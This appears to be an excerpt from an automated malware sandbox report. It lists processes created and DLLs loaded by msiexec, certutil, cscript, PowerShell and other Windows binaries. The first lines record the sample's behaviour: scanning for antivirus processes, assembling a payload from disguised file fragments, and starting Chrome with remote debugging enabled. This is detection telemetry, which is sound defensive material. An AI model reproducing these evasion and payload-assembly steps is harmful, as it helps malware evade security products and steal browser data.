            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 628056
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Cleared" Penalties
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Participating + ..\Produced + ..\Tvs + ..\Contractor + ..\Legislative u
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\628056\Corrections.com Corrections.com u
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
            Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2696 --field-trial-handle=2408,i,649146787284632151,17109937592652742530,262144 /prefetch:8
            Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: srpapi.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: cryptnet.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: msihnd.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: srclient.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: spp.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: vssapi.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: vsstrace.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msi.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: samcli.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: logoncli.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: samcli.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: logoncli.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.ui.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windowmanagementapi.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: textinputframework.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: inputhost.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: coreuicomponents.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: coremessaging.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: coremessaging.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: twinapi.appcore.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: twinapi.appcore.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.ui.immersive.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: samcli.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: logoncli.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: samcli.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: logoncli.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: samcli.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: logoncli.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: samcli.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: logoncli.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: samcli.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: logoncli.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msi.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: samcli.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: logoncli.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: samcli.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: logoncli.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: samcli.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: logoncli.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.ui.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windowmanagementapi.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: textinputframework.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: inputhost.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: twinapi.appcore.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: coremessaging.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: twinapi.appcore.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: coreuicomponents.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: coremessaging.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: coremessaging.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: coreuicomponents.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.ui.immersive.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll
            Source: C:\Windows\Installer\MSI64FB.tmp Section loaded: msi.dll
            Source: C:\Windows\Installer\MSI64FB.tmp Section loaded: kernel.appcore.dll
            Source: C:\Windows\Installer\MSI64FB.tmp Section loaded: uxtheme.dll
            Source: C:\Windows\Installer\MSI64FB.tmp Section loaded: sxs.dll
            Source: C:\Windows\Installer\MSI64FB.tmp Section loaded: onecorecommonproxystub.dll
            Source: C:\Windows\Installer\MSI64FB.tmp Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
            Source: C:\Windows\System32\certutil.exe Section loaded: certcli.dll
            Source: C:\Windows\System32\certutil.exe Section loaded: cabinet.dll
            Source: C:\Windows\System32\certutil.exe Section loaded: cryptui.dll
            Source: C:\Windows\System32\certutil.exe Section loaded: ncrypt.dll
            Source: C:\Windows\System32\certutil.exe Section loaded: netapi32.dll
            Source: C:\Windows\System32\certutil.exe Section loaded: ntdsapi.dll
            Source: C:\Windows\System32\certutil.exe Section loaded: version.dll
            Source: C:\Windows\System32\certutil.exe Section loaded: secur32.dll
            Source: C:\Windows\System32\certutil.exe Section loaded: certca.dll
            Source: C:\Windows\System32\certutil.exe Section loaded: cryptsp.dll
            Source: C:\Windows\System32\certutil.exe Section loaded: samcli.dll
            Source: C:\Windows\System32\certutil.exe Section loaded: logoncli.dll
            Source: C:\Windows\System32\certutil.exe Section loaded: dsrole.dll
            Source: C:\Windows\System32\certutil.exe Section loaded: netutils.dll
            Source: C:\Windows\System32\certutil.exe Section loaded: sspicli.dll
            Source: C:\Windows\System32\certutil.exe Section loaded: ntasn1.dll
            Source: C:\Windows\System32\certutil.exe Section loaded: uxtheme.dll
            Source: C:\Windows\System32\certutil.exe Section loaded: profapi.dll
            Source: C:\Windows\System32\cscript.exe Section loaded: version.dll
            Source: C:\Windows\System32\cscript.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\cscript.exe Section loaded: uxtheme.dll
            Source: C:\Windows\System32\cscript.exe Section loaded: sxs.dll
            Source: C:\Windows\System32\cscript.exe Section loaded: vbscript.dll
            Source: C:\Windows\System32\cscript.exe Section loaded: amsi.dll
            Source: C:\Windows\System32\cscript.exe Section loaded: userenv.dll
            Source: C:\Windows\System32\cscript.exe Section loaded: profapi.dll
            Source: C:\Windows\System32\cscript.exe Section loaded: wldp.dll
            Source: C:\Windows\System32\cscript.exe Section loaded: msasn1.dll
            Source: C:\Windows\System32\cscript.exe Section loaded: cryptsp.dll
            Source: C:\Windows\System32\cscript.exe Section loaded: rsaenh.dll
            Source: C:\Windows\System32\cscript.exe Section loaded: cryptbase.dll
            Source: C:\Windows\System32\cscript.exe Section loaded: msisip.dll
            Source: C:\Windows\System32\cscript.exe Section loaded: wshext.dll
            Source: C:\Windows\System32\cscript.exe Section loaded: scrobj.dll
            Source: C:\Windows\System32\cscript.exe Section loaded: mpr.dll
            Source: C:\Windows\System32\cscript.exe Section loaded: scrrun.dll
            Source: C:\Windows\System32\cscript.exe Section loaded: windows.storage.dll
            Source: C:\Windows\System32\cscript.exe Section loaded: propsys.dll
            Source: C:\Windows\System32\cscript.exe Section loaded: edputil.dll
            Source: C:\Windows\System32\cscript.exe Section loaded: urlmon.dll
            Source: C:\Windows\System32\cscript.exe Section loaded: iertutil.dll
            Source: C:\Windows\System32\cscript.exe Section loaded: srvcli.dll
            Source: C:\Windows\System32\cscript.exe Section loaded: netutils.dll
            Source: C:\Windows\System32\cscript.exe Section loaded: windows.staterepositoryps.dll
            Source: C:\Windows\System32\cscript.exe Section loaded: sspicli.dll
            Source: C:\Windows\System32\cscript.exe Section loaded: wintypes.dll
            Source: C:\Windows\System32\cscript.exe Section loaded: appresolver.dll
            Source: C:\Windows\System32\cscript.exe Section loaded: bcp47langs.dll
            Source: C:\Windows\System32\cscript.exe Section loaded: slc.dll
            Source: C:\Windows\System32\cscript.exe Section loaded: sppc.dll
            Source: C:\Windows\System32\cscript.exe Section loaded: onecorecommonproxystub.dll
            Source: C:\Windows\System32\cscript.exe Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sxs.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msxml3.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mlang.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msdart.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: windows.storage.dll
